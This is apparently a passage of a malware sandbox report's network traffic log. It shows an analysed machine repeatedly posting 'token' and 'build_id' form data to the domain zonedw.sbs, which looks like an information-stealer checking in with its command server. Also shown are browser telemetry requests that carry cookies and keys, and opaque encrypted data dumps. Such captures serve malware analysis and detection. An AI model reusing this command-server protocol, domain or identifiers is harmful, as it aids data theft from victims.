2024-12-13 17:58:50 UTC	1390	IN	Data Raw: 78 c3 9a 50 64 5d fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd Data Ascii: xPd]@uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4\|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[u
2024-12-13 17:58:50 UTC	1390	IN	Data Raw: e1 6d c0 c8 18 51 ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd Data Ascii: mQVkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G\|?6:{r;iG
2024-12-13 17:58:50 UTC	1390	IN	Data Raw: c3 10 d6 1f b2 cd fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}\|.nw'Gw=n'CSZB=
2024-12-13 17:58:50 UTC	1390	IN	Data Raw: ad 00 5e b3 4e cb 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 Data Ascii: ^Ns=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%pA8C4qc(>@z1/V\|#Bo4v_mnniN ZKa./<_PBzi7~>
2024-12-13 17:58:50 UTC	1390	IN	Data Raw: a5 20 e7 31 76 b4 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 Data Ascii: 1v=K`!3\|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9\|c`rlqIm7n/n$i9xS=qwlVs^\|\|s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g
2024-12-13 17:58:50 UTC	1390	IN	Data Raw: 02 c0 b2 db c0 47 fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 Data Ascii: GfO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm\|n9*ENf+y1AQ-9w.Tvm'W:iw\|K.9-6l[/y[}5'y$+H%:Y1/F
2024-12-13 17:58:50 UTC	1390	IN	Data Raw: 08 3f f4 d3 de f8 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 Data Ascii: ?AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i\|\|$yfxE?d;VR??p\<Wp;s.IN1
2024-12-13 17:58:50 UTC	1390	IN	Data Raw: 0b c5 44 73 d4 f2 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 Data Ascii: DsQNtY\|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?\|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYy

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.7	50351	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:51 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----OZCB1D2NOP8QIEKFKFK6 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:51 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 5a 43 42 31 44 32 4e 4f 50 38 51 49 45 4b 46 4b 46 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 43 42 31 44 32 4e 4f 50 38 51 49 45 4b 46 4b 46 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 43 42 31 44 32 4e 4f 50 38 51 49 45 4b 46 4b 46 4b 36 0d 0a 43 6f 6e 74 Data Ascii: ------OZCB1D2NOP8QIEKFKFK6Content-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------OZCB1D2NOP8QIEKFKFK6Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------OZCB1D2NOP8QIEKFKFK6Cont
2024-12-13 17:58:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:52 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.7	50353	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:52 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DJMYUAAS26FUAAS0HVS0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:52 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 4a 4d 59 55 41 41 53 32 36 46 55 41 41 53 30 48 56 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 44 4a 4d 59 55 41 41 53 32 36 46 55 41 41 53 30 48 56 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 44 4a 4d 59 55 41 41 53 32 36 46 55 41 41 53 30 48 56 53 30 0d 0a 43 6f 6e 74 Data Ascii: ------DJMYUAAS26FUAAS0HVS0Content-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------DJMYUAAS26FUAAS0HVS0Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------DJMYUAAS26FUAAS0HVS0Cont
2024-12-13 17:58:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:53 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.7	50362	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:54 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----L68GDBIWLXBIMYMO8GV3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:54 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4c 36 38 47 44 42 49 57 4c 58 42 49 4d 59 4d 4f 38 47 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 38 47 44 42 49 57 4c 58 42 49 4d 59 4d 4f 38 47 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 38 47 44 42 49 57 4c 58 42 49 4d 59 4d 4f 38 47 56 33 0d 0a 43 6f 6e 74 Data Ascii: ------L68GDBIWLXBIMYMO8GV3Content-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------L68GDBIWLXBIMYMO8GV3Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------L68GDBIWLXBIMYMO8GV3Cont
2024-12-13 17:58:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:55 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.7	50364	51.132.193.105	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:55 UTC	1044	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734119261932&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 11557 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=27D5836E84FB6FA100DF963A85896E2B; _EDGE_S=F=1&SID=189B3437E698653C251B2163E7526413; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-13 17:58:55 UTC	11557	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 33 54 31 39 3a 34 37 3a 34 31 2e 39 33 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 34 31 34 64 33 61 66 32 2d 37 63 64 37 2d 34 38 64 63 2d 39 63 32 31 2d 66 35 31 30 38 66 36 31 63 38 31 63 22 2c 22 65 70 6f 63 68 22 3a 22 31 34 33 36 37 39 30 32 31 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-13T19:47:41.931Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"414d3af2-7cd7-48dc-9c21-f5108f61c81c","epoch":"1436790217"},"app":{"locale
2024-12-13 17:58:55 UTC	894	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=02c6674dfd314a5daabae8f92c064845&HASH=02c6&LV=202412&V=4&LU=1734112735595; Domain=.microsoft.com; Expires=Sat, 13 Dec 2025 17:58:55 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=e9d7762f5d434f93adb24729bc1d1257; Domain=.microsoft.com; Expires=Fri, 13 Dec 2024 18:28:55 GMT; Path=/;Secure; SameSite=None time-delta-millis: -6526337 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Fri, 13 Dec 2024 17:58:55 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.7	50367	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:55 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----A16890ZCT2V3E3OP8QQQ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:55 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 31 36 38 39 30 5a 43 54 32 56 33 45 33 4f 50 38 51 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 41 31 36 38 39 30 5a 43 54 32 56 33 45 33 4f 50 38 51 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 41 31 36 38 39 30 5a 43 54 32 56 33 45 33 4f 50 38 51 51 51 0d 0a 43 6f 6e 74 Data Ascii: ------A16890ZCT2V3E3OP8QQQContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------A16890ZCT2V3E3OP8QQQContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------A16890ZCT2V3E3OP8QQQCont
2024-12-13 17:58:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:56 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.7	50365	51.132.193.105	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:56 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734119261935&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5066 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=27D5836E84FB6FA100DF963A85896E2B; _EDGE_S=F=1&SID=189B3437E698653C251B2163E7526413; _EDGE_V=1; msnup=
2024-12-13 17:58:56 UTC	5066	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 33 54 31 39 3a 34 37 3a 34 31 2e 39 33 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 34 31 34 64 33 61 66 32 2d 37 63 64 37 2d 34 38 64 63 2d 39 63 32 31 2d 66 35 31 30 38 66 36 31 63 38 31 63 22 2c 22 65 70 6f 63 68 22 3a 22 31 34 33 36 37 39 30 32 31 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-13T19:47:41.934Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"414d3af2-7cd7-48dc-9c21-f5108f61c81c","epoch":"1436790217"},"app":{"locale
2024-12-13 17:58:56 UTC	894	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=e0cc1697cece42c1948ddb6ebfb0f427&HASH=e0cc&LV=202412&V=4&LU=1734112736261; Domain=.microsoft.com; Expires=Sat, 13 Dec 2025 17:58:56 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=827d01f976c046dbaa0aaa6a3c8db4cd; Domain=.microsoft.com; Expires=Fri, 13 Dec 2024 18:28:56 GMT; Path=/;Secure; SameSite=None time-delta-millis: -6525674 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis 